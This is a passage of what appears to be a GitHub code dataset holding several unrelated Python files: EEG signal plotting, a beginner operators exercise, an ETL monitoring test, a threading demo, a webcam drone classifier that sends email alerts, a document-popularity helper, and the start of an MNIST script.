chan_name, nperseg=20, nfft=20, fs=250, ylim=-1, xmin=None, xlim=None, fig_x=15, fig_y=10):\n if xmin is None:\n xmin = max(eeg_data.lf - 2, 1)\n \n if xlim is None:\n xlim = eeg_data.hf + 2\n\n title = eeg_data.title\n line = eeg_data.stimulus_frequency\n \n fig, ax = plt.subplots(figsize=(fig_x, fig_y))\n for i in range(len(chan_name)):\n f, psd = signal.welch(eeg_data.filtered_signal[i], fs=fs, nperseg=nperseg*fs, noverlap=0, nfft=nfft*fs)\n ax.plot(f, psd, label='{}'.format(chan_name[i]))\n if line:\n for l in line:\n ax.axvline(x=l, color='gray', linestyle='--')\n ax.text(l+0.2, 0, 'f = '+str(l)+'Hz', color='lightgray')\n ax.set_xlabel('Frequency (Hz)')\n ax.set_ylabel('Amplitude')\n \n ax.set_xlim(xmin, xlim)\n ax.set_xticks(np.arange(xmin, xlim, 1))\n if ylim != -1:\n ax.set_ylim(0, ylim)\n ax.legend()\n ax.set_title('PSD ' + title)\n plt.tight_layout()\n plt.show()\n\n\ndef psd_plot_interactive(eeg_data_list, chan_name, nperseg_max=20, nfft_max=20, fs=250, ylim=-1, xmin=None, xlim=None, fig_x=15, fig_y=10):\n \n def plot_psd(nperseg, nfft, x_min, x_lim, y_lim):\n for eeg_data in eeg_data_list:\n if x_min is None:\n x_min = max(eeg_data.lf - 2, 1)\n \n if x_lim is None:\n x_lim = eeg_data.hf + 2\n\n title = eeg_data.title\n line = eeg_data.stimulus_frequency\n \n fig, ax = plt.subplots(figsize=(fig_x, fig_y))\n for i in range(len(chan_name)):\n f, psd = signal.welch(eeg_data.filtered_signal[i], fs=fs, nperseg=nperseg*fs, noverlap=0, nfft=nfft*fs)\n ax.plot(f, psd, label='{}'.format(chan_name[i]))\n if line:\n for l in line:\n ax.axvline(x=l, color='gray', linestyle='--')\n ax.text(l+0.2, 0, 'f = '+str(l)+'Hz', color='lightgray')\n ax.set_xlabel('Frequency (Hz)')\n ax.set_ylabel('Amplitude')\n \n ax.set_xlim(x_min, x_lim)\n ax.set_xticks(np.arange(x_min, x_lim, 1))\n if y_lim != -1:\n ax.set_ylim(0, y_lim)\n ax.legend()\n ax.set_title('PSD ' + title)\n plt.tight_layout()\n plt.show()\n\n def update_nfft_range(*args):\n nfft_slider.min = nperseg_slider.value\n\n nperseg_slider = widgets.IntSlider(value=20, min=1, max=nperseg_max, step=1, description='nperseg*fs:')\n nfft_slider = widgets.IntSlider(value=20, min=nperseg_slider.value, max=nfft_max, step=1, description='nfft*fs:')\n\n nperseg_slider.observe(update_nfft_range, 'value')\n\n widgets.interact(plot_psd, nperseg=nperseg_slider, nfft=nfft_slider, x_min=xmin, x_lim=xlim, y_lim=ylim)\n\n\ndef amplitude_plot(filt_signal, chan_name, title = '', fs=250, lim = 150,xlim=None):\n n_samples = filt_signal.shape[1]\n\n # Generate a time vector for the signal\n t = np.arange(n_samples) / fs\n\n # Create a single plot with a single subplot\n fig, ax = plt.subplots(figsize=(15, 3))\n\n # Loop through each signal and plot it on the same subplot\n for i in range(len(filt_signal)):\n ax.plot(t, filt_signal[i], label='{}'.format(chan_name[i]))\n\n ax.set_xlabel('Time (s)')\n ax.set_ylabel('Amplitude')\n ax.set_ylim(-1*lim, lim)\n if xlim:\n ax.set_xlim(0, xlim)\n ax.legend()\n ax.set_title(title)\n plt.tight_layout()\n plt.show()\n\n\ndef reshape_to_epochs(data, epoch_length=3, fs=250):\n n_channels, n_samples = data.shape\n n_epochs = int(n_samples / (epoch_length * fs))\n epoch_samples = epoch_length * fs\n epoch_data = np.zeros((n_epochs, n_channels, epoch_samples))\n \n for i in range(n_epochs):\n start = i * epoch_samples\n end = start + epoch_samples\n epoch_data[i] = data[:, start:end]\n\n return epoch_data\n\ndef chan_hemisphere(chan_name):\n # left hemisphere -> odd numbers (1,3,5,7) \n left_hemisphere = [chan for chan in chan_name if 
chan[-1].isdigit() and int(chan[-1]) % 2 != 0]\n    # right hemisphere -> even numbers (2,4,6,8)\n    right_hemisphere = [chan for chan in chan_name if chan[-1].isdigit() and int(chan[-1]) % 2 == 0]\n    # midline -> z\n    midline_hemisphere = [chan for chan in chan_name if chan[-1] == 'z']\n    return left_hemisphere, midline_hemisphere, right_hemisphere\n\ndef hemisphere_signal_avg(eeg, chan_name):\n    left_hemisphere, midline_hemisphere, right_hemisphere = chan_hemisphere(chan_name)\n\n    # separate the signal into left and right hemisphere and take the average per channel\n    left_hemisphere_signal = np.mean(eeg.filtered_signal[[chan_name.index(chan) for chan in left_hemisphere],:], axis=0)\n    right_hemisphere_signal = np.mean(eeg.filtered_signal[[chan_name.index(chan) for chan in right_hemisphere],:], axis=0)\n    midline_hemisphere_signal = np.mean(eeg.filtered_signal[[chan_name.index(chan) for chan in midline_hemisphere],:], axis=0)\n    \n    return left_hemisphere_signal, midline_hemisphere_signal, right_hemisphere_signal\n\ndef plot_spectrogram_and_bands(eeg, chan_name, title=None, band_freqs=None, f_min=5, f_max=15, fs=250, nfft=3, nperseg=3):\n    if band_freqs:\n        f_min = min(band_freqs) - 2\n        f_max = max(band_freqs) + 2\n    else:\n        band_freqs = [f_min, f_max]\n    total_signal = np.mean(eeg.filtered_signal, axis=0)\n    left_hemisphere_signal, midline_hemisphere_signal, right_hemisphere_signal = hemisphere_signal_avg(eeg, chan_name)\n\n    def masked_spectrogram(sig, nperseg=3,nfft=3):\n        frequencies, times, spectrogram = signal.spectrogram(sig, fs=fs, nperseg=fs*nperseg, noverlap=fs*nperseg/2, scaling='spectrum', mode='psd', nfft=fs*nfft)\n        mask = (frequencies >= f_min) & (frequencies <= f_max)\n        spectrogram_masked = spectrogram[mask, :]\n        frequencies_masked = frequencies[mask]\n        return frequencies_masked, times, spectrogram_masked\n    \n    # Plot the spectrogram using matplotlib\n    \n    fig, axs = plt.subplots(nrows=2, ncols=3,figsize=(15, 6))\n    def plot_spectro(ax, sig, title):\n        frequencies_masked, times, spectrogram_masked = masked_spectrogram(sig, nperseg=nperseg,nfft=nfft)\n        ax.pcolormesh(times, frequencies_masked, spectrogram_masked)\n        ax.set_ylim(f_min, f_max)\n        ax.set_ylabel('Frequency [Hz]')\n        ax.set_xlabel('Time [sec]')\n        ax.set_title(title)\n    \n    # plot spectro per each channel in a 2 by 4\n    # for i, chan in enumerate(chan_name):\n    #     if i < 4:\n    #         plot_spectro(axs[0,i], eeg.filtered_signal[i,:], chan)\n    #     else:\n    #         plot_spectro(axs[1,i-4], eeg.filtered_signal[i,:], chan)\n\n\n    plot_spectro(axs[0,0], left_hemisphere_signal, 'Left Hemisphere Signal')\n    plot_spectro(axs[0,1], midline_hemisphere_signal, 'Midline Signal')\n    plot_spectro(axs[0,2], right_hemisphere_signal, 'Right Hemisphere Signal')\n\n    def plot_bands(ax, sig, title):\n        frequencies_masked, times, spectrogram_masked = masked_spectrogram(sig)\n        # Plot the PSDs in the frequency bands of interest through time\n        for i, band_freq in enumerate(band_freqs):\n            band_mask = (frequencies_masked >= band_freq-1) & (frequencies_masked <= band_freq+1)\n            psd = np.mean(spectrogram_masked[band_mask, :], axis=0)\n            ax.plot(times, psd, label=f'{band_freqs[i]} Hz band')\n        ax.set_xlim(times[0], times[-1])\n        ax.set_xlabel('Time [sec]')\n        ax.set_ylabel('PSD')\n        ax.legend()\n        ax.set_title(title)\n\n    if band_freqs:\n        plot_bands(axs[1,0], left_hemisphere_signal, 'Left Hemisphere Signal')\n        plot_bands(axs[1,1], left_hemisphere_signal-right_hemisphere_signal, 'Delta Left vs Right')\n        plot_bands(axs[1,2], right_hemisphere_signal, 'Right Hemisphere Signal')\n    \n    if title:\n        fig.suptitle(title)\n    plt.tight_layout()\n    plt.show()\n\n\ndef plot_spectrogram_and_bands(eeg, chan_name, title=None, band_freqs=None, f_min=5, f_max=15, fs=250, nfft=3, nperseg=3):\n    if band_freqs:\n        f_min = min(band_freqs) - 2\n        f_max = max(band_freqs) + 2\n    else:\n        band_freqs = [f_min, f_max]\n    total_signal = np.mean(eeg.filtered_signal, axis=0)\n    left_hemisphere_signal, midline_hemisphere_signal, right_hemisphere_signal = hemisphere_signal_avg(eeg, chan_name)\n\n    def masked_spectrogram(sig, nperseg=6,nfft=6):\n        # filter it first from f_min to f_max\n        sig = custom_filter(sig, f_min, f_max, fs, 'bandpass')\n\n        frequencies, times, spectrogram = signal.spectrogram(sig, fs=fs, nperseg=fs*nperseg, noverlap=fs*nperseg/2, scaling='spectrum', mode='psd', nfft=fs*nfft)\n        mask = (frequencies >= f_min) & (frequencies <= f_max)\n        spectrogram_masked = spectrogram[mask, :]\n        frequencies_masked = frequencies[mask]\n        return frequencies_masked, times, spectrogram_masked\n    \n    # Plot the spectrogram using matplotlib\n    \n    # fig, axs = plt.subplots(nrows=2, ncols=3,figsize=(15, 6))\n    fig, axs = plt.subplots(nrows=1, ncols=4,figsize=(15, 3))\n    def plot_spectro(ax, sig, title, nfft, nperseg):\n        frequencies_masked, times, spectrogram_masked = masked_spectrogram(sig, nperseg=nperseg,nfft=nfft)\n        ax.pcolormesh(times, frequencies_masked, spectrogram_masked, cmap ='magma')\n        ax.set_ylim(f_min, f_max)\n        ax.set_ylabel('Frequency [Hz]')\n        ax.set_xlabel('Time [sec]')\n        ax.set_title(title)\n        # add yline for stimulus\n        # for stim in eeg.stimulus_frequency:\n        #     ax.axhline(y=stim, color='gray', linestyle='--')\n\n    plot_spectro(axs[0], left_hemisphere_signal, 'Left Hemisphere Signal', nfft, nperseg)\n    plot_spectro(axs[1], midline_hemisphere_signal, 'Midline Signal', nfft, nperseg)\n    plot_spectro(axs[2], right_hemisphere_signal, 'Right Hemisphere Signal', nfft, nperseg)\n    plot_spectro(axs[3], right_hemisphere_signal-left_hemisphere_signal, 'Delta Signal', nfft, nperseg)\n\n    if title:\n        fig.suptitle(title)\n    plt.tight_layout()\n    plt.show()\n    ","repo_name":"alken01/BCI","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":16436,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"32391117437","text":"topic = \"clearing doubts in class{}\"\nprint(topic.format(topic))\ncourse = \"python\"\nweek = 5\nparticipant = 3\ntopic = \"all {} participants meet {} times a week and practice {} everyday\"\nprint(topic.format(participant,week,course))\n\ntopic = \"all {0} participants meet {1} times a week and practice {2} everyday\"\nprint(topic.format(week,participant,course) + \"Everyday\")\nprint(topic.index('practice'))\nprint(\"substring practice is:\" , topic.index(\"practice\"))\n###substring with 
arguments\n#print(\"substring practice is:\" , topic.index(\"program\"))\n\n####Today's Homework\n#####Arithmetic operations in a function\n# Python Arithmetic Operators\n# Arithmetic operators are used with numeric values to perform common mathematical operations:\n# Operator\t Name\n# +\tAddition\t x + y\n# -\tSubtraction x - y\n# *\tMultiplication\t x * y\n# /\tDivision\t x / y\n# %\tModulus\t x % y\n# **\tExponentiation\t x ** y\n# //\tFloor division\t x // y\n\nx = int(input(\"enter x is:\"))\ny = int(input(\"enter y is:\"))\noperator =input(\"enter a operator is:\")\ndef multi_arithmetic_operations(x,y, operator):\n    if operator == 'sum':\n        return x + y\n    if operator == 'sub':\n        return x - y\n    if operator == 'mul':\n        return x*y\n    if operator == 'div':\n        return x/y\n    if operator == 'mod':\n        return x%y\n    if operator == 'expo':\n        return x**y\n    if operator == 'floor div':\n        return x//y\n\n#########Python Comparison Operators\n# ==\tEqual\t x == y\n# !=\tNot equal\t x != y\n# >\t Greater than\t x > y\n# <\t Less than\t x < y\n# >=\tGreater than or equal to\t x >= y\n# <=\tLess than or equal to\t x <= y\n    if operator == \"equalto\":\n        return x == y\n    if operator == \"notequalto\":\n        return x != y\n    if operator == \"greaterthan\":\n        return x > y\n    if operator == \"lessthan\":\n        return x < y\n    if operator == \"greaterthan or equalto\":\n        return x >= y\n    if operator == \"lessthan or equalto\":\n        return x <= y\nprint(multi_arithmetic_operations(x, y, operator))\n####PYTHON LOGICAL OPERATORS :\n# Operator\tDescription\n# and \tReturns True if both statements are true\t x < 5 and x < 10\n# or\tReturns True if one of the statements is true\t x < 5 or x < 4\n# not\tReverse the result, returns False if the result is true \tnot(x < 5 and x < 10)\n\ndef logical_operator(x,operator):\n\n    if operator == 'and':\n        return x < 5 and x <10\n    if operator == 'or':\n        return x<5 or x<7\n    if operator == 'not':\n        return( not(x<5 and x<8))\n\nx = int(input(\"enter x is:\"))\noperator = input(\"enter operator is: \")\nprint(logical_operator(x,operator))\n\n\n\n","repo_name":"padmajalanka/tutorials","sub_path":"homework/todayclasswork.py","file_name":"todayclasswork.py","file_ext":"py","file_size_in_byte":3198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"33512645762","text":"import datetime\n\nimport pytest\n\nfrom taxi.maintenance import run\nfrom taxi.util import dates\n\nfrom atlas_etl.crontasks import delay_monitoring\n\n\nTIMESTAMP_NOW = 1619827200\nNOW = datetime.datetime.utcfromtimestamp(TIMESTAMP_NOW)\n\n\n@pytest.mark.now(NOW.isoformat())\nasync def test_solomon_stats(cron_context, loop, get_stats_by_label_values):\n    stuff_context = run.StuffContext(\n        lock=None,\n        task_id='some-id',\n        start_time=dates.utcnow(),\n        data=cron_context,\n    )\n    await delay_monitoring.do_stuff(stuff_context, loop)\n\n    stats = get_stats_by_label_values(cron_context, {'sensor': 'delay'})\n    assert stats == [\n        {\n            'kind': 'DGAUGE',\n            'labels': {'etl_name': 'ods.weather', 'sensor': 'delay'},\n            'timestamp': 1619827200.0,\n            'value': 12059100.0,\n        },\n        {\n            'kind': 'DGAUGE',\n            'labels': {\n                'etl_name': 'opteum.driver_order_metrics',\n                'sensor': 'delay',\n            },\n            'timestamp': 1619827200.0,\n            'value': 11022300.0,\n        },\n        {\n            'kind': 'DGAUGE',\n
            'labels': {'etl_name': 'ods.food_orders', 'sensor': 'delay'},\n            'timestamp': 1619827200.0,\n            'value': 4470480.0,\n        },\n        {\n            'kind': 'DGAUGE',\n            'labels': {\n                'etl_name': 'ods.callcenter_call_history',\n                'sensor': 'delay',\n            },\n            'timestamp': 1619827200.0,\n            'value': 52314900.0,\n        },\n        {\n            'kind': 'DGAUGE',\n            'labels': {'etl_name': 'ods.scooter_orders', 'sensor': 'delay'},\n            'timestamp': 1619827200.0,\n            'value': 287100.0,\n        },\n        {\n            'kind': 'DGAUGE',\n            'labels': {'etl_name': 'ods.scooter_positions', 'sensor': 'delay'},\n            'timestamp': 1619827200.0,\n            'value': 200700.0,\n        },\n    ]\n","repo_name":"Alexander-Berg/2022-tests-examples-2","sub_path":"Taxi/test_atlas_etl/cron/test_delay_monitoring.py","file_name":"test_delay_monitoring.py","file_ext":"py","file_size_in_byte":1952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"33351549735","text":"import threading\nimport os\nimport subprocess\nimport time\n\n\ndef fun_daemon():\n\tprint(\"Daemon thread started\")\n\ttime.sleep(5)\n\tsubprocess.check_output(\"notepad.exe\",shell=True)\n\tprint(\"I may never get displayed\")\n\n\ndef fun_nondaemon():\n\tprint(\"non daemon thread started\")\n\tfor i in range(1,500):\n\t\tprint(\"Non daemon Iteration:\",i)\n\tprint(\"Non daemon thread ended\")\n\nprint(\"Main thread started\")\nt1 = threading.Thread(target=fun_daemon)\nt2 = threading.Thread(target=fun_nondaemon)\nt1.daemon = True\nt1.start()\nt2.start()\nfor x in range(1,10):\n\tprint(\"Main thread in iteration \", x)","repo_name":"reg1reg1/GoshDarnAlgorithmicProgramming","sub_path":"Gfg/GFG Python/ysingthread.py","file_name":"ysingthread.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"43553401225","text":"from keras.models import load_model\nimport keras\nprint(\"keras version \" + keras.__version__)\n\nimport numpy\nprint(\"numpy version \" + numpy.__version__)\n\nimport tensorflow\nprint(\"tensorflow version \" + tensorflow.__version__)\n\nimport h5py\nprint(\"h5py version \" + h5py.__version__)\n\nfrom PIL import Image, ImageOps\nimport numpy as np\n\nimport cv2\nprint(\"cv2 version \" + cv2.__version__)\n\nimport os\nimport smtplib\nimport time\nimport datetime\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nfrom email.mime.image import MIMEImage\n\n#import RPi.GPIO as GPIO\nfrom time import sleep\n\n# GPIO.setwarnings(False)\n# GPIO.setmode(GPIO.BCM)\n# \n# GPIO.setup(17,GPIO.OUT) #GPIO 4 -> Motor 1 terminal A\n\ndef stop():\n    #GPIO.output(17,True) #2A+\n    pass\n\n\nstrFrom = 'from@gmail.com'\nstrTo = 'to@gmail.com'\n\n\ndef send_mail(drone_type):\n\n    # Define these once; use them twice!\n    DateTimefilename = datetime.datetime.now().strftime(\"%Y-%m-%d-%H.%M.%S\")\n    \n    # Create the root message and fill in the from, to, and subject headers\n    msgRoot = MIMEMultipart('related')\n    msgRoot['Subject'] = 'Waste Alert!!! 
' + DateTimefilename\n    msgRoot['From'] = strFrom\n    msgRoot['To'] = strTo\n    \n    msgRoot.preamble = 'This is a multi-part message in MIME format.'\n\n    # Encapsulate the plain and HTML versions of the message body in an\n    # 'alternative' part, so message agents can decide which they want to display.\n    msgAlternative = MIMEMultipart('alternative')\n    msgRoot.attach(msgAlternative)\n\n\n    msgText = MIMEText('This is the alternative plain text message.')\n    msgAlternative.attach(msgText)\n\n    # We reference the image in the IMG SRC attribute by the ID we give it below\n#    msgText = MIMEText('Garbage Waste - Detected. <br><img src=\"cid:image1\"><br>From: Alpha Technologies!', 'html')\n#    msgAlternative.attach(msgText)\n\n    if(drone_type == 0):\n        # We reference the image in the IMG SRC attribute by the ID we give it below\n        msgText = MIMEText('Enemy Drone White - Detected. <br><img src=\"cid:image1\"><br>From: Alpha Technologies!', 'html')\n        msgAlternative.attach(msgText)\n        # This example assumes the image is in the current directory\n        fp = open('/root/projects/drone_detection/white_enemy/0.jpg', 'rb')\n    elif(drone_type == 1):\n        # We reference the image in the IMG SRC attribute by the ID we give it below\n        msgText = MIMEText('Friend Drone Black - Detected. <br><img src=\"cid:image1\"><br>From: Alpha Technologies!', 'html')\n        msgAlternative.attach(msgText)\n        # This example assumes the image is in the current directory\n        fp = open('/root/projects/drone_detection/black_friend/0.jpg', 'rb')\n    \n    msgImage = MIMEImage(fp.read())\n    fp.close()\n\n    # Define the image's ID as referenced above\n    msgImage.add_header('Content-ID', '<image1>')\n    msgRoot.attach(msgImage)\n    \n    # Send the email (this example assumes SMTP authentication is required)\n    \n    smtp = smtplib.SMTP('smtp.gmail.com', 587)\n    smtp.starttls()\n    smtp.login(strFrom, 'set_mail_password_here')\n    smtp.sendmail(strFrom, strTo, msgRoot.as_string())\n    smtp.quit()\n    print(\"Thank You E-Mail has been Sent to %s\" % strTo)\n\n\nvideo = cv2.VideoCapture(0)\n\n# Load the model\nmodel = load_model('keras_model.h5')\n\nframe_count = 10\n\nfinalize_white_enemy_drone_count = []\nfinalize_black_friend_drone_count = []\n\nwhile True:\n    \n    _, frame = video.read()\n    \n    data = np.ndarray(shape=(1, 224, 224, 3), dtype=np.float32)\n\n    color_converted = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n\n    im = Image.fromarray(color_converted)\n\n    size = (224, 224)\n    \n    image = ImageOps.fit(im, size, Image.ANTIALIAS)\n\n    image_array = np.asarray(image)\n    # Normalize the image\n    normalized_image_array = (image_array.astype(np.float32) / 127.0) - 1\n    # Load the image into the array\n    data[0] = normalized_image_array\n\n    # run the inference\n    prediction = model.predict(data)\n    class_name = ['white_friend','black_enemy','no_wastes']\n    output = [class_name[np.argmax(prediction)]]\n    #print(output)\n    #print([class_name[np.argmax(prediction)]])\n#    print(prediction)\n\n#    d_w = np.argmax(prediction)\n#    print(d_w)\n    \n    x=prediction[0][0]\n    y=prediction[0][1]\n    #z=prediction[0][2]\n    \n    print(\"X is \" + str(x))\n    print(\"Y is \" + str(y))\n#    print(z)\n\n    if(x > 0.9 and y < 0.5):\n        print(\"Found White Enemy Drone\")\n        finalize_white_enemy_drone_count.append(\"white_enemy\")\n        #print(finalize_white_enemy_drone_count)\n        #process last 10 frames\n        if( len(finalize_white_enemy_drone_count) >= 10 ):\n            #check if the list has all 10 frames same obj \n            if(all(map(lambda x: x == finalize_white_enemy_drone_count[0], finalize_white_enemy_drone_count[1:]))):\n                print(\"Last \" + str(frame_count) + \" Frame Accuracy White Enemy Drone\")\n                finalize_white_enemy_drone_count.clear()\n                send_mail(0)\n                #stop()\n                #sleep(15)\n        \n    elif(x < 0.5 and y > 0.9):\n        print(\"Found Black Friend Drone\")\n        finalize_black_friend_drone_count.append(\"black_friend\")\n        #print(finalize_black_friend_drone_count)\n        #process last 10 frames\n        if( len(finalize_black_friend_drone_count) >= 10 ):\n            #check if the list has all 10 frames same obj \n            if(all(map(lambda x: x == finalize_black_friend_drone_count[0], finalize_black_friend_drone_count[1:]))):\n                print(\"Last \" + str(frame_count) + \" Frame Accuracy Black Friend Drone\")\n                finalize_black_friend_drone_count.clear()\n                send_mail(1)\n                #stop()\n                #sleep(15)\n        \n    else:\n        print(\"No Drone Found\")\n\n\n    cv2.imshow(\"Prediction\", frame)\n    key=cv2.waitKey(1)\n    if key == ord('q'):\n        break\n\nvideo.release()\ncv2.destroyAllWindows()\n\n","repo_name":"thamo-nature/enemy-drone-detection-live-cam","sub_path":"detect_drone.py","file_name":"detect_drone.py","file_ext":"py","file_size_in_byte":6314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"382581145","text":"from sqlalchemy import func, text\nimport datetime as dt\nfrom models import db_session_users, UserDocument, UserAgency\nimport 
schemas.jurasticsearch as jsearch\nfrom user_helper import get_external_user_id_subquery\n\n# gets the N most popular docs - using how many times a document has been marked \"read\" as a proxy for popularity\ndef get_most_popular_docs(params):\n    num_queries = params.get(\"num_queries\", 5) # n.b. 5 is an arbitrary default\n\n    # use thirty days ago as the limit of the time range for popularity\n    # n.b. bookmarkings could potentially impact this - but that is another potential way to gauge popularity so\n    # that should be ok\n    thirty_days_ago = dt.datetime.now() - dt.timedelta(days=30)\n\n    most_popular_docs = db_session_users.query(UserDocument.doc_id, func.count(UserDocument.doc_id).label('total'))\\\n        .filter_by(read=True).filter(UserDocument.user_id.in_(get_external_user_id_subquery()))\\\n        .filter(UserDocument.updated_at > thirty_days_ago).group_by(UserDocument.doc_id)\\\n        .order_by(text('total desc')).limit(num_queries).all()\n\n    # retrieve the document titles so we can include them in the payload with just one extra ES call\n    query = {\n        \"query\": {\n            \"bool\": {\n                \"must\": {\n                    \"terms\": {\"id\": [d[0] for d in most_popular_docs]}\n                }\n            }\n        },\n        \"_source\": {\"include\": [\"id\", \"title\"]}\n    }\n    docs_with_titles = jsearch.query_records(query, 'documents')\n\n    # create a map of the doc titles so we can easily tack this on to the id/count below\n    doc_id_title_map = {d['id']: d['title'] for d in docs_with_titles}\n\n    return {\n        \"popular_docs\": [\n            {\"doc_id\": d[0], \"title\": doc_id_title_map[d[0]], \"count\": d[1]} for d in most_popular_docs]\n    }\n\n\n# gets the N most popular sources - using how many times an agency has been followed as a proxy for popularity\n# n.b. limiting to just federal agencies for now\ndef get_most_popular_sources(params):\n    num_queries = params.get(\"num_queries\", 5) # n.b. 5 is an arbitrary default\n    fed_agency_ids = get_all_fed_agency_ids()\n\n    most_popular_sources = db_session_users.query(UserAgency.agency_id, func.count(UserAgency.agency_id).label('total')) \\\n        .filter(UserAgency.user_id.in_(get_external_user_id_subquery()))\\\n        .filter(UserAgency.agency_id.in_(fed_agency_ids)).group_by(UserAgency.agency_id).order_by(text('total desc'))\\\n        .limit(num_queries).all()\n\n    return {\n        \"popular_sources\": [{\"agency_id\": d[0], \"count\": d[1]} for d in most_popular_sources]\n    }\n\n# class to memoize the federal agency_ids in our system so we don't need to look these up each time\n# note: the set of possible agency_ids changes very infrequently, so let's make the update interval every day\nclass FedAgencyIdMemoizer:\n    def __init__(self):\n        self.memoized_agency_ids_for_search = None\n        self.last_memoized_time = None\n\n    def get_agency_ids(self):\n        if self.memoized_agency_ids_for_search is not None and self.last_memoized_time > dt.datetime.now() - dt.timedelta(days=1):\n            return self.memoized_agency_ids_for_search\n        else:\n            self.last_memoized_time = dt.datetime.now()\n\n            query = {\n                \"query\": {\n                    \"bool\": {\n                        \"must\": {\n                            \"term\": {\"type\": \"federal_executive\"}\n                        }\n                    }\n                },\n                # n.b. 
1000 is arbitrary but needs to be set higher than the total # of fed agencies (currently ~400)\n                \"size\": 1000,\n                \"_source\": {\"include\": [\"id\"]}\n            }\n            agency_ids = [a['id'] for a in jsearch.query_records(query, 'agencies')]\n\n            self.memoized_agency_ids_for_search = agency_ids\n            return self.memoized_agency_ids_for_search\n\nagency_id_memoizer = FedAgencyIdMemoizer()\ndef get_all_fed_agency_ids():\n    return agency_id_memoizer.get_agency_ids()","repo_name":"ReactARDev/React_Redux_Python","sub_path":"backend/helpers/popular_entity_helper.py","file_name":"popular_entity_helper.py","file_ext":"py","file_size_in_byte":4022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17077103175","text":"import time\n\nimport pandas as pd\nfrom pydantic import BaseModel\n\nfrom binanceTrade.autotrader import enums, logger\n\n\nclass SymbolKline(BaseModel):\n    symbol: str = \"\"\n    interval: enums.Interval = None\n    dfKline: pd.DataFrame = None\n    last_update: int = None\n    name: str = None\n\n    class Config:\n        arbitrary_types_allowed = True\n\n    def __init__(self, *args, **kwargs):\n        super().__init__(**kwargs)\n        self.name = f'{self.symbol}_{self.interval.name}'\n        # store the last update time in milliseconds\n        self.last_update = int(time.time() * 1000)\n\n    # def _check_data_integrity(self):\n    #     \"\"\"Checking data continuity by 'time_open'\n    #\n    #     :return:\n    #     :rtype:\n    #     \"\"\"\n    #     list_time_open = tuple(self.dfKline['time_open'].to_list())\n    #     for i in range(1, len(list_time_open)):\n    #         if list_time_open[i] != list_time_open[i - 1] + self.interval.ms:\n    #             raise ValueError(\"The integrity of the data is violated\")\n\n\nclass SymbolKlineWithEMA(SymbolKline):\n    short: int = 1\n    middle: int = 1\n    long: int = 1\n\n    def __init__(self, *args, **kwargs):\n        super().__init__(**kwargs)\n        self._ema_calculate()\n\n    def _get_ema(self, index: int, period: int):\n        \"\"\"Get the EMA value at 'index'. 
The last row has 'index' = 0.\n\n        :param index: 0 - value now, 1 - value previous bar ...\n        :type index: int\n        :param period: self.short or self.middle or self.long\n        :type period: int\n        :return: value MA with :period: and (len(df.index)-index)\n        :rtype: float\n        \"\"\"\n        col = f'ema_{period}'\n        return self.dfKline[col].iloc[-index - 1]\n\n    def shortEMA(self, index: int):\n        return self._get_ema(index, self.short)\n\n    def middleEMA(self, index: int):\n        return self._get_ema(index, self.middle)\n\n    def longEMA(self, index: int):\n        return self._get_ema(index, self.long)\n\n    def update(self, data: dict):\n        \"\"\"Receive a data dictionary from WSS and update :self.dfKline:\n\n        :param data:\n        :type data:\n        \"\"\"\n\n        new_row = {\n            'time_open': data.get('t'),\n            'open': float(data.get('o')),\n            'high': float(data.get('h')),\n            'low': float(data.get('l')),\n            'close': float(data.get('c')),\n            'volume': float(data.get('v')),\n            'time_close': data.get('T'),\n            'q_asset_vol': float(data.get('q')),\n            'num_trades': data.get('n'),\n            'tb_base_av': float(data.get('V')),\n            'tb_quote_av': float(data.get('Q')),\n            'ignore': data.get('B')\n        }\n\n        def _ema(period, close, previous):\n            k = 2 / (period + 1)\n            ema = close * k + previous * (1 - k)\n            return ema\n\n        _close = new_row.get('close')\n        df = self.dfKline\n        # Add the new EMA values computed from the stream data\n        for period in (self.short, self.middle, self.long):\n            # Take the previous EMA value\n            previous: float\n            try:\n                previous = df.loc[df['time_open'] == data.get('t') - self.interval.ms, f'ema_{period}'].values[0]\n            except Exception as e:\n                logger.error(\"Continuity destroyed.\", e)\n                # without the previous bar the EMA cannot be updated, so skip this message\n                return\n\n            new_row[f'ema_{period}'] = \\\n                _ema(\n                    period,\n                    _close,\n                    previous\n                )\n\n        if new_row['time_open'] not in self.dfKline['time_open'].values:\n            # Add row\n            self.dfKline = pd.concat([self.dfKline, pd.DataFrame(new_row, index=[0])], join='outer', ignore_index=True)\n        else:\n            # Update row\n            self.dfKline.update(pd.DataFrame(new_row, index=[df.loc[df['time_open'] == new_row['time_open']].index[0]]),\n                                overwrite=True)\n        # logger.debug(self.name)\n        # logger.debug(self.dfKline.tail(1))\n        # self.last_update = int(time.time() * 1000)\n\n    def _ema_calculate(self):\n        \"\"\"DataFrame must have int index for iteration\n\n        :return:\n        :rtype:\n        \"\"\"\n\n        for period in (self.short, self.middle, self.long):\n            # if period is None:\n            #     continue\n            k = 2 / (period + 1)\n            self.dfKline[f'ema_{period}'] = None\n            self.dfKline[f'ema_{period}'] = self.dfKline[f'ema_{period}'].astype('float')\n\n            previous_ema = self.dfKline.iloc[0]['close']\n            for i, row in self.dfKline.iterrows():\n                close = row['close']\n                new_ema = close * k + previous_ema * (1 - k)\n                self.dfKline.loc[i, f'ema_{period}'] = new_ema\n                previous_ema = new_ema\n\n        # self.df_list.append(df)\n        # return df\n\n","repo_name":"zenBool/traderFastAPI","sub_path":"binanceTrade/autotrader/models/symbol_kline.py","file_name":"symbol_kline.py","file_ext":"py","file_size_in_byte":4720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25100778742","text":"import tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import confusion_matrix\n\nfrom tensorflow.examples.tutorials.mnist import input_data\ndata = 